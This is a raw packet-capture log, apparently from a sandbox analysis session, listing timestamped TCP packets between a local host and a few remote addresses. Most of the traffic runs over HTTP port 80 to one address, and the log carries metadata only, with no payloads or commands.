Nov 7, 2024 07:33:25.657512903 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657516956 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.657522917 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.657555103 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.657582045 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690053940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690069914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690080881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690092087 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690103054 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690112114 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690114021 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690146923 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690164089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690179110 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690191031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690220118 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690227032 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690232992 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690242052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690258980 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690259933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690269947 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690279961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690283060 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690290928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690301895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690306902 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690310001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690320969 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690330982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690331936 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690340996 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690351963 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690361977 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690370083 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690371990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690385103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690387964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690395117 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690399885 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690404892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690414906 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.690432072 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.690457106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.691972017 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.692008018 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.692087889 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.716404915 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.716432095 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.716495037 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.717319965 CET	49904	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.717334032 CET	443	49904	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.720038891 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.720242977 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.720257998 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.720592976 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.720936060 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.720999956 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.721066952 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.730375051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.730421066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.730433941 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.730468035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.730504990 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.730531931 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.730571985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.760476112 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.760586023 CET	443	49898	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.760674000 CET	49898	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.767328024 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.773093939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773144007 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.773264885 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773360968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.773636103 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773647070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773689985 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.773736000 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.773941994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773952961 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773962975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773973942 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773986101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.773988962 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.773997068 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774007082 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774017096 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774018049 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774029970 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774059057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774085999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774096966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774101973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774111032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774132013 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774151087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774285078 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774296045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774324894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774344921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774465084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774477005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774487019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774498940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774502039 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774507999 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774533987 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774554968 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774554968 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774568081 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774576902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774589062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774599075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774600983 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774605036 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774614096 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774617910 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774626017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774646997 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774671078 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774708986 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774724960 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774735928 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774746895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774755955 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774766922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.774766922 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774780035 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.774799109 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.775994062 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776004076 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776012897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776031017 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776041985 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776051998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776062012 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776063919 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776074886 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776083946 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776088953 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776096106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776106119 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776106119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776124954 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776139975 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776151896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776153088 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776161909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776173115 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776177883 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776272058 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776488066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776498079 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776506901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776516914 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776527882 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776532888 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776537895 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776549101 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776550055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776557922 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776568890 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776580095 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776580095 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776590109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776596069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776602030 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776628971 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776638031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776648998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776653051 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776679993 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776845932 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776856899 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776866913 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776878119 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776885986 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776889086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776906967 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776916981 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776916981 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776928902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776940107 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776951075 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776951075 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.776971102 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776988029 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.776993990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777009964 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777019024 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777029037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777040005 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777050018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777050972 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777060032 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777070045 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777079105 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777086973 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777096033 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777097940 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777110100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777120113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777121067 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777128935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777132988 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777139902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777148008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777158022 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777163982 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777170897 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777182102 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777192116 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777193069 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777204037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777211905 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777214050 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777224064 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777235031 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777239084 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777245998 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777256966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777261972 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777267933 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777281046 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777283907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777295113 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777304888 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777311087 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777316093 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777323961 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777328014 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777338982 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777348995 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777354002 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777359009 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777369976 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777379990 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777381897 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777398109 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777405977 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777409077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777416945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777420044 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.777456999 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.777894020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.798712969 CET	49903	443	192.168.2.4	13.107.246.45
Nov 7, 2024 07:33:25.798731089 CET	443	49903	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.808278084 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808326006 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808342934 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808388948 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808398008 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808407068 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808479071 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808491945 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808506966 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808518887 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808552980 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808584929 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808595896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808605909 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808633089 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808645964 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808739901 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808751106 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808760881 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808773994 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.808780909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808799028 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.808820963 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809040070 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809050083 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809060097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809072971 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809084892 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809089899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809097052 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809137106 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809154034 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809165001 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809202909 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809283972 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809294939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809304953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809318066 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809334040 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809351921 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809366941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809494019 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809505939 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809516907 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.809542894 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.809555054 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.850250959 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.850264072 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.850274086 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.850317955 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.850342989 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.885528088 CET	443	49900	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.887320995 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.887392998 CET	443	49899	172.240.127.234	192.168.2.4
Nov 7, 2024 07:33:25.887449026 CET	49899	443	192.168.2.4	172.240.127.234
Nov 7, 2024 07:33:25.890455961 CET	443	49901	13.107.246.45	192.168.2.4
Nov 7, 2024 07:33:25.891632080 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891684055 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.891700029 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891742945 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.891750097 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891762018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891803026 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.891933918 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891946077 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891956091 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891968012 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891978979 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.891979933 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.891994953 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892009020 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892020941 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892046928 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892095089 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892103910 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892113924 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892127037 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892137051 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892142057 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892148018 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892178059 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892189026 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892268896 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892281055 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892292023 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892298937 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892340899 CET	49882	80	192.168.2.4	185.215.113.16
Nov 7, 2024 07:33:25.892419100 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892427921 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892437935 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892448902 CET	80	49882	185.215.113.16	192.168.2.4
Nov 7, 2024 07:33:25.892460108 CET	80	49882	185.215.113.16	192.168.2.4
